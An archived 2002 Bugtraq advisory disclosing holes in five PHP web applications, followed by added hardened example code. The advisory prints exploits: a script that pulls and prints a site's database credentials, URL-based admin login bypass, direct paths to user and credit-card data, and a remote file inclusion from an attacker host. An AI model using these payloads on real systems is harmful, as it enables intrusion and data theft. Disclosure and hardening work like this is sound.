Multiple Web Security Holes

From: Frog Man (leseulfrogat_private)
Date: Wed Oct 02 2002 - 10:22:15 PDT


    I sent this three times to webappsec but without results.
    So I am trying bugtraq, although that is less appropriate.
    
    
    -----------------------------------------------------
    Five products in PHP are vulnerable to various holes.
    
    1) TightAuction
    Website : http://www.tightprices.com
    Tested Version : 3.0
    Problem : DB information disclosure
    Exploit :
    <?
    $victime="http://[target]";
    include("$victime/config.inc");
    print("Infos de la DataBase du site $victime : \n \n");
    print("Login : $DB_Username \nPassword : $DB_Password \nServer : 
    $DB_Database");
    ?>
    
    
    2) PY-Membres
    Website : http://py-scripts.levillage.org/
    Tested Version : 3.1
    Problem : Access to all accounts
    Exploit :
    http://[target]/index.php?pymembs=admin
    http://[target]/index.php?pymembs=[USER]
    
    Problem :
    <?
    if ($pymembs)
    {
    $login=$pymembs;
    session_start();
    session_register('login');
    }
    else { session_start(); }
    [...]
    if(!session_is_registered('login'))
    {
    ?>
    [...]
    
    3) upb PB
    Website : http://www.webrc.ca/
    Tested Version : 1.0b
    Problem : Information disclosure
    Exploit :
    http://[target]/db/users.dat
    
    4) MidiCart PHP
    Website : http://www.midicart.com
    Version : 1
    Problems : Information disclosure, Upload
    Exploit :
    http://{target}/admin/credit_card_info.php
    http://{target}/admin/upload.php
    
    5) Pphlogger
    Website : http://www.phpee.com
    Tested Versions : 2.0.9, 2.2.1, 2.2.2a
    Problem : Include file
    Exploit :
    http://[target]/showhits.php3?rel_path=http://[attacker]
    with
    http://[attacker]/main_location.inc
    or
    http://[attacker]/config.inc.php3
    or
    http://[attacker]/get_userdata.php3
    
    Problem :
    if (!isset($rel_path)) $rel_path="";
    include $rel_path."config.inc.php3";
    include $rel_path."get_userdata.php3";
    
    
    
    For more details & patches :
    In French :
    http://www.frog-man.org/tutos/5holes10.txt
    
    Translated by Google :
    http://translate.google.com/translate?u=http%3A%2F%2Fwww.frog-man.org%2Ftutos%2F5holes10.txt&langpair=fr%7Cen&hl=fr&ie=ASCII&oe=ASCII
    
    -----------------------------------------------------
    
    Sorry for my poor English.
    frog-m@n
    
    
    
    



    This archive was generated by hypermail 2b30 : Wed Oct 02 2002 - 11:53:00 PDT
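
Hardened counterparts of the two "Problem :" snippets quoted in the post (PY-Membres and Pphlogger), as an added example that is not part of the original message or of either project's code. The function names, the user table and the demo directory are assumptions made for illustration.

```php
<?php
// Added illustration, not from the advisory; all names and sample data are hypothetical.

// Pphlogger pattern: include $rel_path."config.inc.php3" with $rel_path set by the request.
// Hardened: the base directory is chosen by the server and the file name is allowlisted.
function safe_include_path(string $baseDir, string $file): ?string
{
    $allowed = ['config.inc.php3', 'get_userdata.php3', 'main_location.inc'];
    if (!in_array($file, $allowed, true)) {
        return null;
    }
    $base = realpath($baseDir);
    $path = realpath($baseDir . DIRECTORY_SEPARATOR . $file);
    // realpath() only resolves existing local files, so a URL base yields false.
    if ($base === false || $path === false
        || strpos($path, $base . DIRECTORY_SEPARATOR) !== 0) {
        return null;
    }
    return $path;
}

// PY-Membres pattern: $login = $pymembs, i.e. the session identity comes from the URL.
// Hardened: identity is returned only after the password is verified.
function authenticate(array $post, array $users): ?string
{
    $user = $post['user'] ?? '';
    $pass = $post['pass'] ?? '';
    if (!is_string($user) || !is_string($pass) || !isset($users[$user])) {
        return null;
    }
    // On success the caller would call session_regenerate_id(true)
    // and set $_SESSION['login'] to the returned name.
    return password_verify($pass, $users[$user]) ? $user : null;
}

// Constructed sample data.
$users = ['admin' => password_hash('correct horse', PASSWORD_DEFAULT)];
$dir = sys_get_temp_dir() . DIRECTORY_SEPARATOR . 'include_demo';
is_dir($dir) || mkdir($dir);
file_put_contents($dir . DIRECTORY_SEPARATOR . 'config.inc.php3', "<?php\n");

var_dump(authenticate(['pymembs' => 'admin'], $users));                 // name only
var_dump(authenticate(['user' => 'admin', 'pass' => 'correct horse'], $users));
var_dump(safe_include_path($dir, 'config.inc.php3'));                   // local file
var_dump(safe_include_path('http://attacker.example', 'config.inc.php3')); // URL base
```

Setting `allow_url_include = Off` in php.ini (the default in current PHP) additionally blocks includes of remote URLs at the interpreter level.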